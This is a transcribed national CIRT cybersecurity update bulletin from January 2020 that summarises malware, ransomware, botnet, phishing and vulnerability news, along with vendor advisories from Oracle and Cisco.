NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES - 6th January 2020 - National KE ...
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES
6th January 2020
Summary Impact Metric Against Count of Events
Headlines
Critical High Medium Informative
Regional Highlights 0 0 0 1
Top Stories 0 0 0 2
System 0 2 0 2
vulnerabilities
Malware 0 3 0 0
DDoS/Botnets 0 1 0 0
Spam & phishing 0 2 0 0
Web Security 0 2 0 0
Updates & alerts 1 3 2 0
Source 1: Standard Digital ( https://www.standardmedia.co.ke/ )
Regional https://www.standardmedia.co.ke/business/article/2001355350/google-denies-xiaomi-access-
Highlights over-security-bug
Impact value: Informative
Google bars Chinese firm Xiaomi over security bug. Google has revoked a Chinese tech giant’s
access rights after a user was able to view the feed from a stranger’s security cameras on his
device.Source 1: The Washington Post ( https://www.washingtonpost.com/ )
https://www.washingtonpost.com/technology/2020/01/03/cyber-attack-should-be-expected-us-
strike-iranian-leader-sparks-fears-major-digital-disruption/
Impact value: Informative
‘A cyberattack should be expected’: U.S. strike on Iranian leader sparks fears of major digital
disruption. US Government fears a new wave of cyber attacks from Iran as retaliation for the
airstrike that killed Maj. Gen. Qassim Suleimani at the Baghdad airport in Iraq.
Top Stories
Source 2: Yahoo News ( https://sg.news.yahoo.com/ )
https://sg.news.yahoo.com/chinese-scientists-develop-portable-quantum-
144357951.html?guccounter=1&guce_referrer=aHR0cHM6Ly9jeXdhcmUuY29tL2N5YmVyLXNlY3
VyaXR5LW5ld3MtYXJ0aWNsZXM_cD0y&guce_referrer_sig=AQAAABYH6ijo_Qewne2jP3Idxov-
xYmeo3QiS76QZtCh7oxCBagXVvqzX4Iz9cEkelQMwSaBiaFHSmubVoTGbMmKHHY5GnNDaUbkevu
g6gkWfHiaWWUYFIIF9XOfgkFjbGw4RRzNAuO4A-dHuZBe-d0q5TtTpO8htLsg_Wcke7Hu5XZ5
Impact value: Informative
Portable quantum satellite communication device. Chinese scientists have developed a quantum
satellite ground station that is not only capable of sending ultra-secure messages anywhere in
the world but also fits inside a family car.Source 1: Health IT Security ( https://healthitsecurity.com/ )
Impact value: High
https://healthitsecurity.com/news/new-mexico-hospital-finds-malware-infection-on-digital-
imaging-server
New Mexico Hospital Finds Malware Infection on Digital Imaging Server. The healthcare data of
500 patients of Roosevelt General Hospital was exposed due to a malware infection. The
potentially compromised data included the patient’s name, contact information, Social Security
number, date of birth, driver’s license, medical data, gender, and health insurance detail. Upon
discovery, the officials had removed the malware and rebuilt the server, while recovering all
impacted patient data.
Source 2: Tech Crunch ( https://techcrunch.com/ )
Impact value: High
System
https://techcrunch.com/2020/01/02/travelex-malware/
vulnerabilities Travelex suspends services after malware attack. London-based currency exchange Travelex has
been forced to go offline and suspend some services following a malware attack launched on
New Year’s eve. It is not known what form of malware has impacted the firm. The incident has
also affected some of its clients like Tesco Bank.
Source 3: Security Affairs ( https://securityaffairs.co/ )
Impact value: Informative
https://securityaffairs.co/wordpress/95913/hacking/d-link-routers-flaws.html
Remote Command Execution and Information disclosure flaws affect dozens of D-Link routers.
Experts have disclosed exploits for remote command execution and information disclosure
vulnerabilities affecting many D-Link routers. The RCE flaw is tracked as CVE-2019-17621 and
resides in the code used to manage UPnP requests. The vulnerability could be exploited by an
unauthenticated attacker to take control of vulnerable devices. D-Link has issued firmware
updates to address the vulnerabilities.Source 4: Talos Intelligence ( https://blog.talosintelligence.com/ )
Impact value: Informative
System https://blog.talosintelligence.com/2020/01/opencv-buffer-overflow-jan-2020.html
Vulnerability Spotlight: Two buffer overflow vulnerabilities in OpenCV. Two buffer overflow
vulnerabilities
vulnerabilities have been discovered in the OpenCV libraries. An attacker could potentially
exploit these bugs to cause heap corruptions and potentially code execution. A patch to address
these issues has been released by the OpenCV.Source 1: Security Affairs ( https://securityaffairs.co/ )
https://securityaffairs.co/wordpress/96017/malware/sodinokibi-ransomware-attack.html
Impact value: High
California IT service provider Synoptek pays ransom after Sodinokibi attack. Synoptek, A
California-based IT service provider decided to pay the ransom to decrypt its files after being
infected with the Sodinokibi ransomware.
Source 2: Fortinet ( https://www.fortinet.com/ )
https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html
Impact value: High
The Curious Case of DeathRansom: Part I. Extensive research has revealed that DeathRansom
Malware ransomware is controlled by attackers that are associated with the spread of other malware
families such as Vidar Stealer, AzoRult, Eviral, 1ms0rry, and Supreme miner. It is found that
these attackers use Russian email service and Russian domain zone “.ru”. The ransomware
scans and encrypts files on local and network drives.
Source 3: Malwarebytes Labs ( https://blog.malwarebytes.com/ )
https://blog.malwarebytes.com/threat-analysis/2019/12/new-evasion-techniques-found-in-
web-skimmers/
Impact value: High
New evasion techniques found in web skimmers. Cybercriminals have found new evasion
techniques to prevent their web skimmers from being detected in online retail shops. This
includes the use of Steganography and WebSocket communication protocol. This makes it
difficult for web crawlers and scanners to detect the malicious JavaScript code injected into
the sites.Source 1: CYWARE ( https://cyware.com/news/ )
https://cyware.com/news/bluehero-botnet-found-scanning-the-internet-to-infect-systems-
with-xmrig-miner-and-gh0st-rat-cfc3d7d9
Impact value: High
BlueHero botnet found scanning the internet to infect systems with XMRig miner and Gh0st
DDoS/Botnets RAT. BlueHero botnet derives its name from the domain bluehero[.]in found in its binary. The
botnet leverages a variety of web exploits to intrude into unpatched web servers. It also
contains several other exploits to spread across the network. To initiate the infection process,
the botnet actively scans for IP addresses with ports 80 and 3389. It then uses Mimikatz to
dump passwords from infected hosts into a Results.txt file.
Source 1: CYWARE ( https://cyware.com/news/ )
Impact value: High
https://cyware.com/news/cybercriminals-adopt-steganography-based-credit-card-skimmer-to-
Spam & steal-payment-card-details-93b72efd
Phishing Cybercriminals Adopt Steganography-based Credit Card Skimmer to Steal Payment Card Details.
Threat actors are particularly using WebSockets to provide a more covert way to exchange data
\\\\\\\\\
than typical HTTP request-responses. When the malicious JavaScript code runs in the browser,
it triggers a client handshake request. Once this is established, a series of bidirectional
messages are exchanged between the victim’s browser and malicious host. These messages
also include the credit card skimming code.Impact value: High
Spam & https://cyware.com/news/scammers-made-nearly-405-million-from-military-personnel-and-
Phishing veterans-since-2012-686eeee1
Scammers Made Nearly $405 Million From\\\\\\\\\
Military Personnel and Veterans Since 2012. Nearly 1
million military personnel and veterans have been duped of $405 million in different scams
since 2012, according to a new report analyzed by the Federal Trade Commission (FTC) and
Better Business Bureau.
Source 1: CNN ( https://edition.cnn.com/ )
https://edition.cnn.com/2020/01/04/politics/dhs-hack-website-trump-trnd/index.html
Impact value: High
DHS monitoring apparent hack of government library program website. A group of alleged
Iranian hackers claims to have breached the website of a US government agency, Federal
Web Security Depository Library Program, on Saturday after the killing of Qasem Soleimani.
Source 2: Security Affairs ( https://securityaffairs.co/ )
https://securityaffairs.co/wordpress/95879/cyber-crime/star-wars-saga-cyber-attacks.html
Impact value: High
Crooks use Star Wars saga as bait in Phishing and malware attacks. Crooks are exploiting the
popularity of the Star War saga to lure users into downloading malware. In order to make this
happen, cybercriminals have flooded social networks and the internet with rogue websites and
files offering previews of the ‘The Rise of Skywalker’ movie and free steams. Kaspersky experts
have discovered over 30 fake and infected streaming sites advertised on social networking
pages.Source 1: US-CERT - Security Bulletin Mailing List ( http://www.us-cert.gov/cas/bulletins/ )
https://www.us-cert.gov/ncas/bulletins/sb19-364
Vulnerability Summary for the Week of December 23, 2019. Recorded by National Institute of Standards and
Technology and National Vulnerability.
Source 2: Oracle Security Bulletins ( http://www.oracle.com/technetwork/topics/security/alerts-
086861.html )
https://www.oracle.com/security-alerts/cpuoct2019.html
Oracle Critical Patch Update Advisory - October 2019; advised action to run available security updates.
https://www.oracle.com/security-alerts/alert-cve-2019-2729.html
Bulletins Oracle Security Alert Advisory - CVE-2019-2729. Decentralization vulnerability in Oracle WebLogic Server
exploitable without authentication requirements; advised action to run security updates.
https://www.oracle.com/security-alerts/bulletinoct2019.html
Oracle Solaris Third Party Bulletin - October 2019; advised action to apply necessary patches.
https://www.oracle.com/security-alerts/linuxbulletinoct2019.html
Oracle Linux Bulletin - October 2019; advised action to apply necessary Oracle Linux Bulletin fixes.
https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html
Map of CVE to Advisory/Alert; advised action to apply the critical patch update for protection against known
vulnerabilities.
https://www.oracle.com/security-alerts/ovmbulletinoct2019.html
Oracle VM Server for x86 Bulletin - October 2019; advised action to apply necessary Oracle VM Server for x86
Bulletin fixes.Source 1: Cisco Security Advisories &
Alerts(http://tools.cisco.com/security/center/publicationListing.x )
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-
auth-bypass
Impact value: Critical
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities. Due to multiple
vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM), a
remote attacker could bypass authentication and execute arbitrary actions with administrative
privileges on an affected device.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-
inject
Updates &
Alerts Impact value: High
Cisco Data Center Network Manager SQL Injection Vulnerabilities. Due to multiple vulnerabilities in
the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM), a remote attacker
could execute arbitrary SQL commands on an affected device.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-
path-trav
Impact value: High
Cisco Data Center Network Manager Path Traversal Vulnerabilities. Due to multiple vulnerabilities in
the REST and SOAP API endpoints and the Application Framework feature of Cisco Data Center
Network Manager (DCNM), a remote attacker could conduct directory traversal attacks on an affected
device.https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-
comm-inject
Impact value: High
Cisco Data Center Network Manager Command Injection Vulnerabilities. Due to multiple
vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM), a
remote attacker with administrative privileges on the DCNM application could inject arbitrary
commands on the underlying operating system (OS).
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-xml-
ext-entity
Updates &
Impact value: Medium
Alerts
Cisco Data Center Network Manager XML External Entity Read Access Vulnerability. Due to improper
handling of XML External Entity (XXE) entries when parsing certain XML files in the SOAP API, a
remote attacker could gain read access to information that is stored on an affected system.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-
unauth-access
Impact value: Medium
Cisco Data Center Network Manager JBoss EAP Unauthorized Access Vulnerability. Due to an incorrect
configuration of the authentication settings on the JBoss Enterprise Application Platform (JBoss EAP),
remote attacker could gain unauthorized access to the JBoss EAP.www.ke-cirt.go.ke
You can also read
